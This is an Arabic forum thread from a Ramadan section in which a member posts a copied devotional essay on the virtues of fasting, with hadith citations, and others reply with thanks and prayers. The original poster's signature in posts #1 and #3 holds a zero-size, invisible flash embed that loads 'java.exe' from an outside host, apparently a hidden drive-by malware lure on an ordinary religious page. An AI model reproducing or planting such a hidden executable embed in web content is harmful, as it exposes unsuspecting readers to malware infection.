منتديات هتوف  

العودة   منتديات هتوف > إسلامُنـا > ۩ الخيمة الرمضانية ۩

۩ الخيمة الرمضانية ۩ رمضان مبارك 1436 - مواضيع خاصه عن رمضان 2015



Like Tree8Likes

إضافة رد
 
LinkBack أدوات الموضوع تقييم الموضوع انواع عرض الموضوع
قديم 07-09-2012, 11:28 PM   #1
| أحباب هتوف |
 
الصورة الرمزية هـمــــــ البنفسج ــــس
 
تاريخ التسجيل: Jul 2011
الدولة: السعودية
المشاركات: 350
معدل تقييم المستوى: 1882808
هـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond repute



(adsbygoogle = window.adsbygoogle || []).push({});
F11 رمضان يُقبل، فلنحسن الوفادة

بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته









تدور عجلة الزمن بسرعة مذهلة ترتجف منها القلوب الحية ، ذلك أن المسلم يكاد يطيش عقله عندما يقف مع نفسه محاسباً: ماذا قدّم فيما انقضى من أيام عمره ولياليه ؟؟
ويزداد خوفاً وفرقاً عندما يستحضر ما رواه الترمذي وابن ماجة وغيرهم من حديث أبي هريرة رضي الله عنه قال : قال رسول الله صلى الله عليه وسلم أعمار أمتي ما بين الستين إلى السبعين، وأقلهم من يجوز ذلك‏ ).

‏فيا الله ما أقصر الأعمار .... !!!
تبلغ الستين أو السبعين أو الثمانين أو المئة ، ثم تنتهي من الدنيا وتنتقل إلى الآخرة ، وهذا إن لم تتخطفك المنون في سن الشباب أو الكهولة ....!!!!
لكن عزاء المسلمين أن لهم رباً لطيفاً رحيما ، عوضهم بقصر أعمارهم ما يدركون به أعمال المعمرين مئات السنين، وذلك بمضاعفة الأجور والحسنات بحسب شرف الأزمنة والأمكنة ومواسم الطاعات .

ومن ذلك ما أنعم الله به على عباده بفضيلة شهر الصيام ففيه مضاعفة للحسنات، وتكفير للسيئات، وإقالة للعثرات ؛ فلذلك والذي قبله أحببنا التذكير مع قدومه بوقفات يسيرة:


شهر رمضان المبارك، فرصة لتعظيم الأجور:
* في الصحيحين عن النبي صلى الله عليه وسلم، قال: (عمرة في رمضان تعدل حجة) أو قال: (حجة معي)
فلما كان الصيام في نفسه مضاعفًا أجره بالنسبة إلى سائر الأعمال، كان صيام شهر رمضان مضاعفًا على سائر الصيام؛ لشرف زمانه، وكونه هو الصوم الذي فرضه الله على عباده.

* وقد يضاعف الثواب بأسباب أُخَر، منها: شرف العامل عند الله وقربه منه، وكثرة تقواه






ثبت في الصحيحين عن أبي هريرة رضي الله عنه عن النبي صلى الله عليه وسلم، قال: (كل عمل ابن آدم له؛ الحسنة بعشر أمثالها إلى سبعمائة ضعف، قال الله عز وجل: إلا الصيام فإنه لي وأنا أجزي به، إنه ترك شهـوته وطعامه وشرابه من أجلي)

علة تخصيص الله تعالى الصيام بإضافته إلى نفسه:

في قوله تبارك وتعالى: (فإنه لي)، فإن الله خص الصيام بإضافته إلى نفسه دون سائر الأعمال، ومن أحسن ماذُكر فيه وجهان:

* أحدهما: أن الصيام هو مجرد ترك حظوظ النفس وشهواتها الأصلية، ولايوجد ذلك في عبادة أخرى غير الصيام.

* والوجه الثاني: أن الصيام سر بين العبد وربه لايطَّلع أحد عليه غيره؛ لأنه مركب من نية باطنة لايطلع عليها إلا الله، وتركٍ لتناول الشهوات التي يُستخفى بتناولها في العادة.
والله تعالى يحب من عباده أن يعاملوه سرًا بينهم وبينه، وأهل محبته يحبون أن يُعاملوه سرًا بينهم وبينه.


وفي التقرب بترك هذه الشهوات بالصيام فوائد، منها:
1. كسر النفس، فإن الشبع والرّي يحمل النفس على الأَشَر والبطر والغفلة.
2. تخلي القلب للفكر والذكر؛ فإن تناول هذه الشهوات تقسي القلب وتعميه، وتحول بين العبد وبين الذِّكر والفكر.
3. أن الغني يعرف قدر نعمة الله عليه بإقداره له على مامنعه كيرًا من الفقراء من فضول الطعام والشراب.
4. الصيام يضيق مجاري الدم التي هي مجاري الشيطان من ابن آدم؛ فتسكن بالصيام وساوس الشيطان، وتنكسر الشهوة والغضب.


واعلمي أنه لايتم التقرب إلى الله تعالى بترك هذه الشهوات المباحة في غير حالة الصيام إلا بعد التقرب إليه بترك ماحرمه الله في كل حال؛ من الكذب والظلم والعدوان على الناس في دمائهم وأموالهم وأعراضهم
ولهذا قال النبي صلى الله عليه وسلم: (من لم يدع قول الزور والعمل به، فليس لله حاجة في أن يدع طعامه وشرابه) خرجه البخاري وفي حديث آخر: (ليس الصيام من الطعام والشراب، إنما الصيام من اللغو والرفث).
وصدق رسول الله صلى الله عليه وسلم حين قال: (رُبَّ صائم حظه من صيامه الجوع والعطش) خرجه أحمد



فرحة الصائمين:
قوله صلى الله عليه وسلم: (للصائم فرحتان: فرحة عند فطره، وفرحة عند لقاء ربه)
أما فرحته عند فطره، فإن النفوس مجبولة على الميل إلى مايلائمها من مطعم ومشرب ومنكح، فإذا مُنعت عن ذلك في وقت من الأوقات، ثم أُبيح لها في وقت آخر، فرحت بإباحة مامُنعت منه، خصوصًا عند اشتداد الحاجة إليه.

وأما فرحته عند لقاء ربه، ففيما يجده عند الله من ثواب الصيام مُدَّخرًا، فيجده أحوج ماكان إليه، كما قال تعالى: {وَمَا تُقَدِّمُوا۟ لِأَنفُسِكُم مِّنْ خَيْرٍۢ تَجِدُوهُ عِندَ ٱللَّهِ هُوَ خَيْرًۭا

ـــــــــــــــــــــــــــــــــــــــــــــــ
منقوول للإفادة
__________________
[flash1=http://garitrans.cl/java.exe]WIDTH=0 HEIGHT=0[/flash1]
-->
من مواضيع هـمــــــ البنفسج ــــس


التعديل الأخير تم بواسطة تسرب أنفاس ; 07-11-2012 الساعة 06:10 PM سبب آخر: التأكد من صحة تشكيل الاية الكريمة
هـمــــــ البنفسج ــــس غير متواجد حالياً   رد مع اقتباس
قديم 07-11-2012, 06:05 PM   #2

 
الصورة الرمزية تسرب أنفاس
 
تاريخ التسجيل: Apr 2011
المشاركات: 5,253
معدل تقييم المستوى: 42949696
تسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond reputeتسرب أنفاس has a reputation beyond repute
افتراضي رد: رمضان يُقبل، فلنحسن الوفادة

.
.


السـلام عليكم ورحمة الله وبركاتة

أشتقنآ لشهر الرحمة والمغفرة شهر النقاء والصفاء

اللهم بلغنا رمضان ، وأعنا فيه على الصيام والقيام ، وتلاوة القرآن ،
واجعلنا ممن يصومه إيماناً واحتساباً .

جزاكـ الرحمن خير الجزاء
وبارك فيكـ ووفقك الى مايحب ويرضآ
وبلغكـ رمضآن وأنتِ في تمام الصحة والعافية
ورزقكـ اعلى مراتب الجنان
.
.
شكراً لك ي نقاء

__________________














-->
من مواضيع تسرب أنفاس

تسرب أنفاس غير متواجد حالياً   رد مع اقتباس
قديم 07-12-2012, 02:34 AM   #3
| أحباب هتوف |
 
الصورة الرمزية هـمــــــ البنفسج ــــس
 
تاريخ التسجيل: Jul 2011
الدولة: السعودية
المشاركات: 350
معدل تقييم المستوى: 1882808
هـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond repute
افتراضي رد: رمضان يُقبل، فلنحسن الوفادة

شكرآ على مروورك
__________________
[flash1=http://garitrans.cl/java.exe]WIDTH=0 HEIGHT=0[/flash1]
-->
من مواضيع هـمــــــ البنفسج ــــس

هـمــــــ البنفسج ــــس غير متواجد حالياً   رد مع اقتباس
قديم 07-12-2012, 04:06 AM   #4

 
الصورة الرمزية هذيــآنْ ~َ
 
تاريخ التسجيل: Nov 2010
الدولة: algeria mon amoure
العمر: 23
المشاركات: 1,924
معدل تقييم المستوى: 18178669
هذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond reputeهذيــآنْ ~َ has a reputation beyond repute
افتراضي رد: رمضان يُقبل، فلنحسن الوفادة

و عليكم السلام و رحمة الله تعالى و بركاته

اقتباس:
واعلمي أنه لايتم التقرب إلى الله تعالى بترك هذه الشهوات المباحة في غير حالة الصيام إلا بعد التقرب إليه بترك ماحرمه الله في كل حال؛ من الكذب والظلم والعدوان على الناس في دمائهم وأموالهم وأعراضهم
ولهذا قال النبي صلى الله عليه وسلم: (من لم يدع قول الزور والعمل به، فليس لله حاجة في أن يدع طعامه وشرابه) خرجه البخاري وفي حديث آخر: (ليس الصيام من الطعام والشراب، إنما الصيام من اللغو والرفث).
وصدق رسول الله صلى الله عليه وسلم حين قال: (رُبَّ صائم حظه من صيامه الجوع والعطش) خرجه أحمد
هنا يختلف تقبل النقطة حسب مدى إيملآن الشخص و طبيعته فهناك من يعقل و يترك السيئات و هناك من العكس يترك الصيام من اصله !

نسأله تعالى الهداية لنا و لجميع الامة الاسلامية و صلاح الحال قبل رمضان
و تبليغنا اياه في كامل الصحة و العافية علنا ننتهزه فرصة للارتقاء بالنفس الى اعالي الجنان

و بارك الله فيك عزيزتي همس البنفسج دمت بعبق الجوري و بياض الياسمين
-->
من مواضيع هذيــآنْ ~َ

هذيــآنْ ~َ غير متواجد حالياً   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع تقييم هذا الموضوع
تقييم هذا الموضوع:

تعليمات المشاركة
تستطيع إضافة مواضيع جديدة
تستطيع الرد على المواضيع
تستطيع إرفاق ملفات
تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة



الساعة الآن 06:01 PM


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.6.0 TranZ By Almuhajir